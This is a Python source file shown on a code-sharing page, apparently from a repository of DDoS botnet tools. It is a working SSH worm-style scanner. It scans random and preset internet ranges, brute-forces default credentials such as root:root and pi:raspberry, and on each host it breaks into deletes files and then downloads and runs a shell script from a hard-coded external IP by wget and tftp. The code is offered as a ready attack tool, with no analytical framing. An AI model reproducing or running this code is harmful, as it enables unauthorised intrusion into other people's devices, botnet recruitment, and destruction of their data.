Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/SSH/unix.py
5038 views
1
#!/usr/bin/env python
2
import threading, paramiko, random, socket, time, sys
3
4
paramiko.util.log_to_file("/dev/null")
5
6
blacklist = [
7
'127'
8
]
9
10
passwords = [
11
"root:root",
12
"root:admin",
13
"admin:admin",
14
"ubnt:ubnt"
15
"root:1234",
16
"admin:1234",
17
"guest:guest",
18
"user:user",
19
"test:test",
20
"pi:raspberry",
21
"vagrant:vagrant"
22
]
23
24
if sys.argv[4] == '1':
25
passwords = ["root:root", "root:admin", "admin:1234"]
26
27
jackmeoff = random.choice(["see nudes of rootgod"])
28
raw_input('Press <ENTER> To '+jackmeoff)
29
30
ipclassinfo = sys.argv[2]
31
if ipclassinfo == "A":
32
ip1 = sys.argv[3]
33
elif ipclassinfo == "B":
34
ip1 = sys.argv[3].split(".")[0]
35
ip2 = sys.argv[3].split(".")[1]
36
elif ipclassinfo == "C":
37
ips = sys.argv[3].split(".")
38
num=0
39
for ip in ips:
40
num=num+1
41
if num == 1:
42
ip1 = ip
43
elif num == 2:
44
ip2 = ip
45
elif num == 3:
46
ip3 = ip
47
class sshscanner(threading.Thread):
48
global passwords
49
global ipclassinfo
50
if ipclassinfo == "A":
51
global ip1
52
elif ipclassinfo == "B":
53
global ip1
54
global ip2
55
elif ipclassinfo == "C":
56
global ip1
57
global ip2
58
global ip3
59
def run(self):
60
while 1:
61
try:
62
while 1:
63
thisipisbad='no'
64
if ipclassinfo == "A":
65
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
66
elif ipclassinfo == "B":
67
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
68
elif ipclassinfo == "C":
69
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
70
elif ipclassinfo == "BRAZIL":
71
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
72
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
73
elif ipclassinfo == "SUPER":
74
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
75
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
76
elif ipclassinfo == "LUCKY":
77
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
78
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
79
elif ipclassinfo == "LUCKY2":
80
lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
81
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
82
elif ipclassinfo == "RAND":
83
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
84
elif ipclassinfo == "INTERNET":
85
lol = ["1"]
86
self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
87
else:
88
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
89
for badip in blacklist:
90
if badip in self.host:
91
thisipisbad='yes'
92
if thisipisbad=='no':
93
break
94
username='root'
95
password=""
96
port = 22
97
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
98
s.settimeout(3)
99
s.connect((self.host, port))
100
s.close()
101
ssh = paramiko.SSHClient()
102
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
103
dobreak=False
104
for passwd in passwords:
105
if ":n/a" in passwd:
106
password=""
107
else:
108
password=passwd.split(":")[1]
109
if "n/a:" in passwd:
110
username=""
111
else:
112
username=passwd.split(":")[0]
113
try:
114
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
115
dobreak=True
116
break
117
except:
118
pass
119
if True == dobreak:
120
break
121
badserver=True
122
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
123
output = stdout.read()
124
if "inet addr" in output:
125
badserver=False
126
if badserver == False:
127
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
128
ssh.exec_command("cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; rm -f *; busybox wget http://89.34.97.125/gtop.sh; sh gtop.sh; wget1 http://89.34.97.125/gtop.sh; sh gtop.sh; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n")
129
time.sleep(20)
130
ssh.close()
131
except:
132
pass
133
134
for x in range(0,int(sys.argv[1])):
135
try:
136
t = sshscanner()
137
t.start()
138
except:
139
pass
140
141